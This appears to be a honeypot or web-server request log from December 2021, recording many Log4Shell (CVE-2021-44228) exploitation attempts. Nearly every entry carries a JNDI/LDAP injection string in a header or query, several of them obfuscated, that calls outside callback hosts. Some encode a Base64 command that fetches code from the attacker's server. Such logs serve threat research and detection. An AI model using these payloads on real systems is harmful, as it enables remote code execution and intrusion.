2021-12-12 159.89.154.64
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-11 108.61.148.110
    URL: GET /
    Referer: -
    User Agent: '${jndi:ldap://sshd-honeypot6.ua.log4j-test.xyz/pentest}'

2021-12-11 108.61.148.110
    URL: GET /
    Referer: -
    User Agent: '${jndi:ldap://sshd-honeypot6.ua.log4j-test.xyz/pentest}'

2021-12-11 46.4.51.212
    URL: GET /
    Referer: http://${jndi:ldap://Referer.sshd-honeypot6.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.bc
    User Agent: Mozilla/5.0

2021-12-11 46.4.51.212
    URL: GET /
    Referer: http://${jndi:ldap://Referer.sshd-honeypot6.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.bc
    User Agent: Mozilla/5.0

2021-12-11 46.4.51.212
    URL: GET /
    Referer: http://${jndi:ldap://Referer.sshd-honeypot6.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.bc
    User Agent: Mozilla/5.0

2021-12-11 46.4.51.212
    URL: GET /
    Referer: http://${jndi:ldap://Referer.sshd-honeypot6.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.bc
    User Agent: Mozilla/5.0

2021-12-11 188.166.225.104
    URL: GET /
    Referer: http://45.33.5.105/
    User Agent: ${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}

2021-12-11 188.166.225.104
    URL: GET /
    Referer: http://45.33.5.105/
    User Agent: ${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4oo8aymh1o4.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4oo8aymh1o6.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4oo8

2021-12-11 188.166.225.104
    URL: GET /
    Referer: https://45.33.5.105/
    User Agent: ${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}

2021-12-11 188.166.225.104
    URL: GET /
    Referer: https://45.33.5.105/
    User Agent: ${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}

2021-12-11 137.184.102.82
    URL: GET /assets/images/favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-11 137.184.102.82
    URL: GET /assets/images/favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-11 137.184.102.82
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-11 137.184.102.82
    URL: GET /login
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-11 157.230.32.67
    URL: GET /assets/images/favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-11 157.230.32.67
    URL: GET /assets/images/favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-11 157.230.32.67
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-11 157.230.32.67
    URL: GET /login
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-11 157.230.32.67
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-11 157.230.32.67
    URL: GET /login
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4t8qobycnz6.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4t8qobycnan.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4t8q

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4t8qobycnar.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4t8qobycnae.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4t8q

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4ogbyydft1q.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4ogbyydft11.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4ogb

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4ogbyydft1n.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4ogbyydft1e.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4ogb

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4o1eoypiyfg.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4o1eoypiyfk.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4o1e

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4o1eoypiyfg.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4o1eoypiyfk.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4o1e

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4ogdoyd85rr.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4ogdoyd85re.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4ogd

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4ogdoyd85rr.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4ogdoyd85re.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4ogd

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4tyxay48nfk.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4tyxay48nfq.inte
    User Agent: ${${::-j${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4tyxa

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4tyxay48nfr.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4tyxay48nfe.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4tyx

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4tyxay48nfr.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4tyxay48nfe.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4tyx

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4tyxay48nfr.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4tyxay48nfe.inte
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4tyx

2021-12-11 194.48.199.78
    URL: GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4tytoy4et6a.interactsh.com/a}
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4tytoy4et6h.inte
    User Agent: ${${::-j${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4tyto

2021-12-11 47.251.46.249
    URL: POST //
    Referer: https://sshd-honeypot20//
    User Agent: ${jndi:ldap://47.254.127.78/#Touch}

2021-12-11 149.248.4.43
    URL: GET /?=${jndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?=${jndi:ldap://ht$tp443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?=$%7Bjndi:ldap://http443path.kryp$toslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?=$%7Bjndi:ldap://http443path.kryp$toslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?=${jndi:ldap://ht$tp443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?=${jndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?=$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?=$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?=$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?=$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?=$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: $%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D

2021-12-11 149.248.4.43
    URL: GET /?=$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: $%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D

2021-12-11 149.248.4.43
    URL: GET /?=$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?x=${jndi:ldap://$hostName.c6qg2lspu892jo716f40cg4o1eoypiyfg.interactsh.com/a
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?x=ldap://;hostName.c6qg2lspu892jo716f40cg4o1eoypiyfg.interactsh.com/a
    Referer: -
    User Agent: lalal${jndi:ldap://

2021-12-11 149.248.4.43
    URL: GET /?x=ldap://;hostName.c6qg2lspu892jo716f40cg4o1eoypiyfg.interactsh.com/a
    Referer: -
    User Agent: lalal${jndi:ldap://

2021-12-11 149.248.4.43
    URL: GET /?x=ldap://;$hostName.c6qg2lspu892jo716f40cg4o1eoypiyfg.interactsh.com/a
    Referer: -
    User Agent: lalal${jndi:ldap://

2021-12-11 149.248.4.43
    URL: GET /?x=${jndi:ldap://$hostName.c6qg2lspu892jo716f40cg4o1eoypiyfg.interactsh.com/a
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?x=${jndi:ldap://$hostName.c6qg2lspu892jo716f40cg4o1eoypiyfg.interactsh.com/a
    Referer: -
    User Agent: curl/7.79.0

2021-12-11 149.248.4.43
    URL: GET /?x=${jndi:ldap://$hostName.c6qg2lspu892jo716f40cg4o1eoypiyfg.interactsh.com/a
    Referer: -
    User Agent: curl/7.79.0

2021-12-10 47.251.46.249
    URL: POST //
    Referer: https://sshd-honeypot13//
    User Agent: ${jndi:ldap://47.254.127.78/#Touch}

2021-12-10 45.155.205.233
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ny4x

2021-12-10 45.155.205.233
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4x

2021-12-10 45.155.205.233
    URL: GET /
    Referer: http://sshd-honeypot4/
    User Agent: ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4x

2021-12-10 46.4.51.212
    URL: GET /
    Referer: http://${jndi:ldap://Referer.sshd-honeypot1.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.bc
    User Agent: Mozilla/5.0

2021-12-10 46.4.51.212
    URL: GET /
    Referer: http://${jndi:ldap://Referer.sshd-honeypot1.jg33feb5c7b2ui8djt4bb9dntez6nv.burpcollaborator.net/a.bc
    User Agent: Mozilla/5.0

2021-12-10 45.155.205.233
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xODUu

2021-12-10 45.155.205.233
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xODUu

2021-12-10 45.155.205.233
    URL: GET /
    Referer: https://x.y.169.9:443/
    User Agent: ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xODUu